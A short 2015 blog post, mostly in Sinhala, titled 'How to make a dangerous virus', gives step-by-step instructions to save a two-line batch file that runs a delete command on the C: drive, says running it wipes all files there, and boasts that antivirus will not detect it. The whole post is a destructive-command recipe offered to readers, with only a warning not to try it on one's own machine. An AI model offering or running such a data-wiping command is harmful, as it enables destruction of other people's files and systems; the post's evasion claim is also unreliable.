Wednesday, December 2, 2015

How to make a dangerous virus

භයානක වෛරස් එකක් හදමු.


      හලෝ කොහොමද මම අද පොඩි වෛරස් එකක් හදන හැටි කියල  දෙන්න හිතුව.(වැරදුනා පොඩි උනාට ලොකු ජංජාලයක් කරන්න පුලුවන් වෛරස් එකක්) මේ වැඩේ ඔයාලගෙ කොම්පියුටර් එකේ අත්හදා බලන්න එපා!!(format කරන්න තියෙන එකක් නම්  කමක් නෑ) මේ Virus එක antivirusguardඑකකකින් අල්ලන්නෙ නෑ හොදේ...

1. මුලින්ම මේ පහල තියෙන Codes ටික Copy කරගෙන Notepad එකටPaste කරගන්න.

                                           
@Echo off
                                          Del C:\ *.* |y


2. ඊට පස්සේ ඕක save කරනකොට Name එක ව්දිහට aluthmaweda.bat  දෙන්න.file types all කරල save කරගන්න.

දැන් ඔයා save කරපු තැනට ආපු Icon එක run කලාම වෙන දේ දන්නවද?

Local disk C එකේ ඔක්කොම files delete වෙනවා...ඒකයි ඔයාලගෙ කොම්පියුටර් වල අත්හදා බලන්න එපා කීවෙ.

තවත් පෝස්ට් එකකින් හමුවෙමු.


No comments:

Post a Comment